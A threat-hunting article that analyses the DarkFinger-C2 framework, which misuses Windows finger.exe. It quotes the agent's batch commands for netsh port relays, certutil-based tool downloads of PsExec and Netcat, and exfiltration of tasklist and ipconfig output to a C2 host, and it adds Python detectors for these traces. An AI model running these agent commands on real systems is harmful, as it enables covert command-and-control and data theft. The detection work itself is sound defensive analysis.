Understanding & Detecting C2 Frameworks — DarkFinger-C2

DarkFinger-C2

FINGER.EXE

From the Windows command line, finger.exe gives the following usage description:

“finger.exe”
finger root@172.22.207.194
“finger.exe” result
#[Server Portion]
import socket
s = socket.socket()
s.bind(("192.168.242.131", 79))   # finger is plain TCP on port 79
s.listen(5)
conn, addr = s.accept()
data = conn.recv(4096).decode()   # the "username" the finger client sent, e.g. "random_data\r\n"
print(data)

#[Client Side]
finger random_data@192.168.242.131
Example code

DarkFinger-C2.py

The server side of DarkFinger doesn’t provide a graphical / web interface but instead a command line interface.

“DarkFinger-C2.py” Help
“DarkFinger-C2.py” Source
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    main(parse_args())

main(args)

main

create_base64_files()

“create_base64_files”
PsExec.exe
Ncat.exe
downloads_dir = "Darkfinger_Downloads"
path = os.getcwd()
if not os.path.exists(path + "\\" + downloads_dir):
    os.makedirs(downloads_dir)
certutil.exe -encode "path\\x" "path\\downloads_dir\\x[:2].lower().txt"
  • downloads_dir = “Darkfinger_Downloads”
  • x = Name of the tool from the config file
certutil.exe -encode "[DarkFinger-C2 Path]\\PsExec.exe" "[DarkFinger-C2 Path]\\Darkfinger_Downloads\\ps.txt"
“remove_cert_info”

fileppe_fingaz()

  • If the data sent by the agent starts with a “.”, the agent wants to exfiltrate data from the infected machine.
  • If the data starts with “ps” or “nc”, the agent wants to download “PsExec” or “Netcat” respectively. (Note that by default these are the only tools supported.)
finga_that_box
Global variables

DarkFinger-C2-Agent.bat

Agent Source
CD \Users\%username%\Desktop
net session >nul 2>&1
IF %errorLevel% == 0 (
ECHO [+] Got Admin privileges!.
SET /a Admin = 0
GOTO Init
) ELSE (
ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!.
SET /a Admin = 1
SET DARK_PORT=79
GOTO CheckOutbound79
)
cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}"
  • DARK_PORT = 79
for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b
SET LOCAL_IP=%LOCAL_IP: =%
Process creation event “cmd.exe”
Process creation event for “ipconfig” & “find”
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F  >nul 2>&1
cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
  • LOCAL_FINGER_PORT = 79
  • DARK_PORT = The port that the C2 is listening on
  • DARK_IP = C2 IP

Example values used in the diagram below:

  • LOCAL_FINGER_PORT = 79
  • DARK_PORT = 443
  • DARK_IP = 10.10.10.200
  • LOCAL_IP = 10.10.10.10
# Anything coming from the C2
10.10.10.10:443 ------[Proxy]------> 10.10.10.10:79
# Anything sent from the client to the C2
10.10.10.10:79 ------[Proxy]------> 10.10.10.200:443
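The two portproxy rules leave a recognisable trace in the host's configuration. As an added example (not part of the article or of the DarkFinger project), the following Python parser reads the output of "netsh interface portproxy show all", reconstructs the v4tov4 rules and flags any rule touching port 79 as well as any rule whose connect target is itself a listener, which is the two-hop chain shown above. The sample output is constructed from the article's example addresses.

```python
import re
from typing import List, Tuple

# Constructed sample of "netsh interface portproxy show all" output, using the
# article's example values (LOCAL_IP=10.10.10.10, DARK_IP=10.10.10.200). The
# third rule is an unrelated RDP forward, included so the detector has a benign line.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.10.10.10     79          10.10.10.200    443
10.10.10.10     443         10.10.10.10     79
0.0.0.0         3389        10.10.10.50     3389
"""

# Four columns: listen address, listen port, connect address, connect port.
# Header and separator lines never match because their port columns are not digits.
RULE_RE = re.compile(r"^\s*(\S+)\s+(\d{1,5})\s+(\S+)\s+(\d{1,5})\s*$")
FINGER_PORT = 79

def parse_portproxy(text: str) -> List[Tuple[str, int, str, int]]:
    """Return one (listen_addr, listen_port, connect_addr, connect_port) tuple per rule."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules

def find_darkfinger_chain(rules) -> List[str]:
    """Flag rules on the finger port and rules that feed into another portproxy listener."""
    findings = []
    listen_keys = {(la, lp) for la, lp, _, _ in rules}
    for la, lp, ca, cp in rules:
        if lp == FINGER_PORT or cp == FINGER_PORT:
            findings.append(f"finger port in portproxy rule {la}:{lp} -> {ca}:{cp}")
        if (ca, cp) in listen_keys:
            # The connect side is another rule's listen side: traffic is being chained
            # through the host, exactly what the agent's two netsh commands build.
            findings.append(f"chained rule: {la}:{lp} -> {ca}:{cp} is itself a listener")
    return findings

if __name__ == "__main__":
    for finding in find_darkfinger_chain(parse_portproxy(SAMPLE_NETSH_OUTPUT)):
        print(finding)
```

The same rules survive in the registry under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 (the key the agent deletes on cleanup), so the parser can be fed an export of that key as well as live netsh output.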
Command Options

PsExec64 / Nc64

As established on the server side, the agent can request to download the tools provided by the C2, which by default are PsExec and Netcat. To do this the finger command is used as follows:

#Download PsExec
finger ps%DELAY%@%IP2USE% > tmp.txt
#Download Netcat
finger nc%DELAY%@%IP2USE% > tmp.txt
# %Tool% can be either "PS" or "NC"
cmd /c more +2 tmp.txt > %Tool%.txt
# %CD% == Current Directory
cmd /c del %CD%\tmp.txt
certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul
cmd /c del %CD%\%Tool%.txt
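The download sequence above (a finger request with a "ps"/"nc" username, "more +2" to strip the finger header lines, then "certutil -decode") leaves a distinctive process-creation trail. The following Python detector is an added example, not part of the article or of the agent: it runs command-line rules over constructed Sysmon-style process events (the pid/ppid/image/cmdline field names are a simplification of my own) and correlates a finger request with a certutil -decode under the same parent process, since the batch agent launches both from one cmd.exe.

```python
import re
from collections import defaultdict

# Constructed process-creation events modelled on the agent's download flow above.
# These are sample records written for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3000, "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger ps30@10.10.10.10"},
    {"pid": 4101, "ppid": 3000, "image": r"C:\Windows\System32\more.com",
     "cmdline": "more +2 tmp.txt"},
    {"pid": 4102, "ppid": 3000, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\bob\Desktop\PS.txt C:\Users\bob\Desktop\PS.EXE"},
    {"pid": 5200, "ppid": 3900, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify -urlfetch C:\\temp\\site.cer"},   # benign certutil use
]

# (rule name, image regex, command-line regex). The finger rule covers the three
# username shapes the article describes: ps/nc downloads, '.' exfil and '!port!' changes.
RULES = [
    ("finger_c2_query", r"\\finger\.exe$", r"\s(ps|nc|\.|!)\S*@"),
    ("certutil_decode", r"\\certutil\.exe$", r"(?i)\s-decode\s"),
    ("more_skip_finger_header", r"\\more\.com$", r"\bmore\s\+2\s"),
    ("netsh_portproxy_add", r"\\netsh\.exe$", r"(?i)portproxy\s+add"),
]

def match_rules(event):
    """Return the names of all rules whose image and command-line patterns both match."""
    hits = []
    for name, image_re, cmd_re in RULES:
        if re.search(image_re, event["image"], re.I) and re.search(cmd_re, event["cmdline"]):
            hits.append(name)
    return hits

def correlate(events):
    """Group rule hits by parent PID and alert when a finger C2 query and a
    certutil -decode share a parent: that pairing is the tool download sequence."""
    per_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["pid"]):
        for hit in match_rules(ev):
            per_parent[ev["ppid"]].append(hit)
    alerts = []
    for ppid, hits in per_parent.items():
        if "finger_c2_query" in hits and "certutil_decode" in hits:
            alerts.append((ppid, hits))
    return alerts

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```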

ExfilTasklist / ExfilIPConfig

The agent by default only allows exfiltration of the output of the following commands:

  • tasklist
  • ipconfig

cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP%
cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do finger ".%%a"@%USE_IP%
“finger” Exfiltration

RemNetShPortProxy / DelProxyNClose

We can remove any previously configured netsh portproxy rules:

REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1

ChgC2ServerPort

The agent can send a command to the C2 indicating that it wants to change the port it is using. This is achieved by surrounding the value in the finger command with two exclamation marks “!”:

finger !%TMP_PORT%!@%LOCAL_IP%
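Every agent action described on this page, the "." exfiltration and "ps"/"nc" downloads handled by fileppe_fingaz as well as the "!port!" request above, travels in the finger username field, so all of them can be classified by a sensor watching TCP/79. The following Python classifier is an added example, not DarkFinger's code: it extracts the username from a raw finger request line (RFC 1288: an optional "/W", the name, CRLF) and mirrors the server's prefix checks over a constructed set of requests. Case-folding the "ps"/"nc" prefix is my assumption; the page only states that the data starts with those letters.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class FingerVerdict:
    kind: str              # "exfil", "tool_download", "port_change" or "benign"
    detail: Optional[str]  # exfiltrated line, tool prefix, or requested port

def parse_finger_request(raw: bytes) -> str:
    """Pull the username field out of a raw finger request (RFC 1288: optional /W, name, CRLF)."""
    line = raw.decode("latin-1").rstrip("\r\n")
    if line.startswith("/W"):      # verbose flag; the agent never sends it, but strip it anyway
        line = line[2:].lstrip()
    return line

def classify_finger_query(query: str) -> FingerVerdict:
    """Mirror the prefix dispatch the DarkFinger server applies to the username field."""
    if query.startswith("."):                          # '.' prefix: exfiltrated command output
        return FingerVerdict("exfil", query[1:])
    if query[:2].lower() in ("ps", "nc"):              # tool request (case folding assumed)
        return FingerVerdict("tool_download", query[:2].lower())
    if len(query) > 2 and query[0] == query[-1] == "!" and query[1:-1].isdigit():
        return FingerVerdict("port_change", query[1:-1])   # "!port!" from ChgC2ServerPort
    return FingerVerdict("benign", None)

# Constructed sample of what a sensor on TCP/79 would see from the agent (not captured traffic).
SAMPLE_REQUESTS = [
    b"root\r\n",                                                 # ordinary finger lookup
    b".svchost.exe\r\n",                                         # one tasklist token per query
    b".   IPv4 Address. . . . . . . . . . . : 10.10.10.10\r\n",  # a full ipconfig /all line
    b"ps30\r\n",                                                 # PsExec download, delay suffix
    b"!8443!\r\n",                                               # C2 asked to move to port 8443
]

def summarize(requests) -> dict:
    """Count verdicts by kind; a host emitting exfil/tool/port_change queries is an agent."""
    counts = {}
    for raw in requests:
        verdict = classify_finger_query(parse_finger_request(raw))
        counts[verdict.kind] = counts.get(verdict.kind, 0) + 1
    return counts

if __name__ == "__main__":
    print(summarize(SAMPLE_REQUESTS))
```

On a Windows estate any finger traffic at all is worth an alert; the classification mainly tells you which agent action produced it, and the "ps"/"nc" rule will also match real usernames beginning with those letters, so corroborate it with volume or with the host-side indicators.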

ShowPortProxy

Display the current netsh portproxy configuration:

netsh interface portproxy show all

Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.